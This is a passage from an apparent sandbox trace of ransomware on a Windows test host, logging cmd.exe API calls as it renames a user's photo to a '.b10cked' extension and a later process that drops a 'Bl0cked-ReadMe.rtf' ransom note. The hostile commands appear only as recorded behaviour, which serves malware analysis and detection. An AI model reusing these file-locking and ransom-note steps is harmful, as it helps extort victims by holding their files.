\"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"" [0141.559] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"" [0141.559] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.559] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.560] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.560] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.560] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.560] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.560] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.560] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.560] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.560] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.560] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.560] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.560] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.560] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.560] GetEnvironmentStringsW () returned 0x3322c8* [0141.560] FreeEnvironmentStringsW (penv=0x3322c8) returned 1 [0141.560] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.560] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.560] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.560] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.560] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.560] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.560] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.560] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.560] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.560] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.560] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f9f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.560] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f9f8, lpFilePart=0x22f9f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f9f4*="Desktop") returned 0x18 [0141.560] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.561] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f774 | out: lpFindFileData=0x22f774) returned 0x330008 [0141.561] FindClose (in: hFindFile=0x330008 | out: hFindFile=0x330008) returned 1 [0141.561] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f774 | out: lpFindFileData=0x22f774) returned 0x330008 [0141.561] FindClose (in: hFindFile=0x330008 | out: hFindFile=0x330008) returned 1 [0141.561] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f774 | out: lpFindFileData=0x22f774) returned 0x330008 [0141.561] FindClose (in: hFindFile=0x330008 | out: hFindFile=0x330008) returned 1 [0141.561] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.561] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.561] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.561] GetEnvironmentStringsW () returned 0x332ae8* [0141.561] FreeEnvironmentStringsW (penv=0x332ae8) returned 1 [0141.561] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.562] GetConsoleOutputCP () returned 0x1b5 [0141.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.562] GetUserDefaultLCID () returned 0x409 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fb38, cchData=128 | out: lpLCData="0") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fb38, cchData=128 | out: lpLCData="0") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fb38, cchData=128 | out: lpLCData="1") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.563] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.564] GetConsoleTitleW (in: lpConsoleTitle=0x3208d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.564] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.564] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.564] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.564] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.564] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.565] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.565] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.565] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.565] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.565] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.565] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.567] GetConsoleTitleW (in: lpConsoleTitle=0x22f830, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.567] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.567] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.567] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.567] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.567] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.567] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.567] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.567] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.567] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.567] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.567] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.567] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.568] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.568] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.568] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.568] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.568] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.568] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.568] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.568] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.568] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.568] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.568] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.568] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.568] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.568] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.568] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.568] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.568] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.568] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.568] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.568] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.568] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.568] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.568] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.569] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f5ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f5e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f5e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.571] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.571] _wcsicmp (_String1="AR0_1P~1.JPG", _String2=".") returned 51 [0141.571] _wcsicmp (_String1="AR0_1P~1.JPG", _String2="..") returned 51 [0141.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1p~1.jpg")) returned 0x20 [0141.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.571] SetErrorMode (uMode=0x0) returned 0x0 [0141.571] SetErrorMode (uMode=0x1) returned 0x0 [0141.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", nBufferLength=0x104, lpBuffer=0x22ef74, lpFilePart=0x22ef5c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", lpFilePart=0x22ef5c*="AR0_1P~1.JPG") returned 0x26 [0141.571] SetErrorMode (uMode=0x0) returned 0x1 [0141.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x11 [0141.571] _wcsicmp (_String1="AR0_1P~1.JPG", _String2=".") returned 51 [0141.571] _wcsicmp (_String1="AR0_1P~1.JPG", _String2="..") returned 51 [0141.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1p~1.jpg")) returned 0x20 [0141.571] SetErrorMode (uMode=0x0) returned 0x0 [0141.571] SetErrorMode (uMode=0x1) returned 0x0 [0141.572] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", nBufferLength=0x104, lpBuffer=0x22f3f0, lpFilePart=0x22f188 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", lpFilePart=0x22f188*="AR0_1P~1.JPG") returned 0x26 [0141.572] SetErrorMode (uMode=0x0) returned 0x1 [0141.572] SetErrorMode (uMode=0x0) returned 0x0 [0141.572] SetErrorMode (uMode=0x1) returned 0x0 [0141.572] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x22f5f8, lpFilePart=0x22f188 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked", lpFilePart=0x22f188*="aR0_1pZCSZwjfY.jpg.b10cked") returned 0x34 [0141.572] SetErrorMode (uMode=0x0) returned 0x1 [0141.572] SetLastError (dwErrCode=0x0) [0141.572] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg.b10cked")) returned 0xffffffff [0141.572] GetLastError () returned 0x2 [0141.572] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x22eb04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb04) returned 0x320f20 [0141.572] FindNextFileW (in: hFindFile=0x320f20, lpFindFileData=0x22eb04 | out: lpFindFileData=0x22eb04) returned 0 [0141.572] GetLastError () returned 0x12 [0141.572] FindClose (in: hFindFile=0x320f20 | out: hFindFile=0x320f20) returned 1 [0141.573] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x331af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331af0) returned 0x320f20 [0141.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x22ed9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked", lpFilePart=0x0) returned 0x34 [0141.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg", nBufferLength=0x104, lpBuffer=0x22ed9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg", lpFilePart=0x0) returned 0x2c [0141.573] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg")) returned 0x20 [0141.573] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg.b10cked"), dwFlags=0x3) returned 1 [0141.574] FindClose (in: hFindFile=0x320f20 | out: hFindFile=0x320f20) returned 1 [0141.574] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22ed50 | out: _Buffer=" 1") returned 9 [0141.574] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.574] GetFileType (hFile=0x7) returned 0x2 [0142.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.172] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ecdc | out: lpMode=0x22ecdc) returned 1 [0142.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.172] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22ed10 | out: lpConsoleScreenBufferInfo=0x22ed10) returned 1 [0142.172] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.173] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22ed50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.173] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22ed34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22ed34*=0x1a) returned 1 [0142.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.173] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.174] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.174] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.174] SetConsoleInputExeNameW () returned 0x1 [0142.174] GetConsoleOutputCP () returned 0x1b5 [0142.174] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.174] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.175] exit (_Code=0) Process: id = "180" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ea0" os_pid = "0xfa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15140 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15141 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15142 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15143 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15144 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15145 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15146 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15147 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15148 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 15149 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16070 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16071 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16072 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16073 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 16074 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 16075 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16076 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16077 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16078 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16079 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16080 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16081 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16082 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16083 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16084 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16085 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16086 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16087 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16088 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16089 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16090 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16091 start_va = 0x2d0000 end_va = 0x3d0fff 